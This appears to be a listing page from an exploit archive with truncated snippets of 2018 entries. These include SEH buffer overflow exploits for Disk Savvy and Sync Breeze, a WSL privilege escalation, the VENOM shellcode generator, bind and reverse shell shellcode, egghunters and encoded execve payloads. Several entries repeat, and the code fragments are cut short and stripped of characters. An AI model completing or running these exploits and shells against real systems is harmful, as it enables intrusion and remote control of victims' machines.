Disk Savvy Enterprise 10.4.18 - Buffer Overflow (SEH)

Exploit Title: Disk Savvy Enterprise v10.4.18 Server - Unauthenticated Remote Buffer Overflow SEH Date: 01/02/2018 Exploit Author: Daniel Teixeira Vendor Homepage: http://www.disksavvy.com/ Software Link: http://www.disksavvy.com/setups/disksavvyentsetupv10.4.18.exe Version: 10.4.18 CVE:...

VENOM 1.0.15 - Metasploit Shellcode Generator/Compiler/Listener

The script will use msfvenom metasploit to generate shellcode in diferent formats c | python | ruby | dll | msi | hta-psh injects the shellcode generated into one template example: python "the python funtion will execute the shellcode into ram" and uses compilers like gcc gnu cross compiler or...

Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes)

global start start: ; sock = socketAFINET, SOCKSTREAM, 0 ; AFINET = 2 ; SOCKSTREAM = 1 ; syscall number 41 push 41 pop rax push 2 pop rdi push 1 pop rsi cdq syscall ; copy socket descriptor to rdi for future use xchg rdi,rax ; server.sinfamily = AFINET ; server.sinport = htonsPORT ;...

Linux/x64 - Twofish Encoded + DNS (CNAME) Password + execve(/bin/sh) Shellcode

/----- Crypter.c ----- / / Optimized Twofish C implementation by Drew Csillag: https://www.schneier.com/code/twofish-cpy.zip Partially re-written by Andre Lima https://andrelima.info to encrypt/decrypt variable length Linux x8664 shellcode. compiler is gccegcs-2.91.66 flags are -O3...

Microsoft Windows Subsystem for Linux - execve() Local Privilege Escalation Exploit

Exploit for windows platform in category local exploits define GNUSOURCE include include include include include include include include include include include include include include include define RINGSIZE 0x2000000 define PIPESIZE 0xb8 define PTRSIZE 0x8 define STRHDRSIZE 0x18 define LEAKOFFS...

Microsoft Windows Subsystem for Linux - execve() Local Privilege Escalation

Microsoft Windows Subsystem for Linux - execve Local Privilege Escalation define GNUSOURCE include include include include include include include include include include include include include include include define RINGSIZE 0x2000000 define PIPESIZE 0xb8 define PTRSIZE 0x8 define STRHDRSIZE 0x...

Microsoft Windows Subsystem for Linux - 'execve()' Local Privilege Escalation

define GNUSOURCE include include include include include include include include include include include include include include include define RINGSIZE 0x2000000 define PIPESIZE 0xb8 define PTRSIZE 0x8 define STRHDRSIZE 0x18 define LEAKOFFSET 0x68 define SHELLCODEOFFSET 0x200 define...

Linux/x64 - Twofish Encoded + DNS (CNAME) Password + execve(/bin/sh) Shellcode

Linux/x64 - Twofish Encoded + DNS CNAME Password + execve/bin/sh Shellcode. Shellcode exploit for Linuxx86-64 platform /----- Crypter.c ----- / / Optimized Twofish C implementation by Drew Csillag: https://www.schneier.com/code/twofish-cpy.zip Partially re-written by Andre Lima...

Sync Breeze Enterprise 10.4.18 - Remote Buffer Overflow (SEH) Exploit

Exploit for windows platform in category remote exploits Exploit Title: Sync Breeze Enterprise v10.4.18 Server - Unauthenticated Remote Buffer Overflow SEH Exploit Author: Daniel Teixeira Vendor Homepage: http://www.syncbreeze.com Software Link:...

Sync Breeze Enterprise 10.4.18 - Remote Buffer Overflow (SEH)

Exploit Title: Sync Breeze Enterprise v10.4.18 Server - Unauthenticated Remote Buffer Overflow SEH Date: 29/01/2018 Exploit Author: Daniel Teixeira Vendor Homepage: http://www.syncbreeze.com Software Link: http://www.syncbreeze.com/setups/syncbreezeentsetupv10.4.18.exe Version: 10.4.18 Tested on:...

LabF nfsAxe 3.7 TFTP Client - Local Buffer Overflow Exploit

Exploit for windows platform in category dos / poc !/usr/bin/python Exploit Author: Miguel Mendez Z Exploit Title: LabF nfsAxe v3.7 - TFTP "Input Directory" Local Buffer Overflow Date: 29-01-2018 Software: LabF nfsAxe Version: v3.7 Vendor Homepage: http://www.labf.com Software Link:...

Linux/x86 - Egghunter Shellcode (12 Bytes)

Linux/x86 - Egghunter Shellcode 12 Bytes. Shellcode exploit for Linuxx86 platform / Title: Linux/x86 - EggHunter Shellcode 12 Bytes Description: Smallest Null-Free Egg Hunter Shellcode - 12 Bytes Date : 14/Jan/2018 Author: Nipun Jaswal @nipunjaswal ; SLAE-1080 Details: 1. Works with an executable...

Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh)+ Null-Free Shellcode (80 bytes)

Linux/ARM - Reverse TCP 192.168.1.1:4444/TCP Shell /bin/sh+ Null-Free Shellcode 80 bytes. Shellcode exploit for ARM platform / Title: Linux/ARM - Reverse Shell TCP /bin/sh. Null free shellcode 80 bytes Date: 2018-01-25 Tested: armv7l Raspberry Pi v3 Author: rtmcx - twitter: @rtmcx / .section .tex...

Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh) Null Free Shellcode (80 bytes)

/ Title: Linux/ARM - Reverse Shell TCP /bin/sh. Null free shellcode 80 bytes Date: 2018-01-25 Tested: armv7l Raspberry Pi v3 Author: rtmcx - twitter: @rtmcx / .section .text .global start start: / Enter Thumb mode / .ARM add r3, pc, 1 bx r3 .THUMB / Create a new socket/ mov r0, 2 // PFINET = 2 mo...

Linux/x86 - Egghunter Shellcode (12 Bytes)

/ Title: Linux/x86 - EggHunter Shellcode 12 Bytes Description: Smallest Null-Free Egg Hunter Shellcode - 12 Bytes Date : 14/Jan/2018 Author: Nipun Jaswal @nipunjaswal ; SLAE-1080 Details: 1. Works with an executable EGG 2. Make sure you clear EDX, EAX registers in the shellcode before any other...

Threat Analysis: Pylot (Travle) Malware Family

The Pylot or Travle malware family appears to be an evolution of the NetTravler malware family which has been linked to attackers out of China by numerous sources. Over the last year a variant has been observed as a secondary payload often used in conjunction with malicious carrier files typicall...

Linux/x86 - Disable ASLR Security + Obfuscated Shellcode (23 bytes)

Linux/x86 - Disable ASLR Security + Obfuscated Shellcode 23 bytes. Shellcode exploit for Linuxx86 platform ;Title : Linux/x86 - Disable ASLR Security obfuscated shellcode - 23 bytes ;Date : 24 Jan 2018 ;Author : 0xAlaufi ;Tested on : Linux/x86 Ubuntu 12.04.5 global start section .text start: jmp...

Linux/x86 - Disable ASLR Security + Obfuscated Shellcode (23 bytes)

;Title : Linux/x86 - Disable ASLR Security obfuscated shellcode - 23 bytes ;Date : 24 Jan 2018 ;Author : 0xAlaufi ;Tested on : Linux/x86 Ubuntu 12.04.5 global start section .text start: jmp zero2 zero18: mov al,0x4 jmp zero19 zero1a: mov al,0x6 jmp zero1b zeroc: push 0x72702f2f jmp zerod zero12:...

Linux/x86 - execve(/bin/sh) + ROT-N + Shift-N + XOR-N Encoded Shellcode (77 bytes)

Linux/x86 - execve/bin/sh + ROT-N + Shift-N + XOR-N Encoded Shellcode 77 bytes. Shellcode exploit for Linuxx86 platform / Description ; Title : ROT-N + Shift-N + XOR-N encoded /bin/sh - Shellcode ; Author : Hashim Jawad ; Blog Post :...

Linux/x86 ROT-N + Shift-N + XOR-N Encoded /bin/sh Shellcode (77 bytes)

/ Description ; Title : ROT-N + Shift-N + XOR-N encoded /bin/sh - Shellcode ; Author : Hashim Jawad ; Blog Post : https://ihack4falafel.com/2018/01/rot-n-shift-n-xor-n-shellcode-encoder-linux-x86/ ; Twitter : @ihack4falafel ; SLAE ID : SLAE-1115 ; Purpose : spawn /bin/sh shell ; Tested On : Ubunt...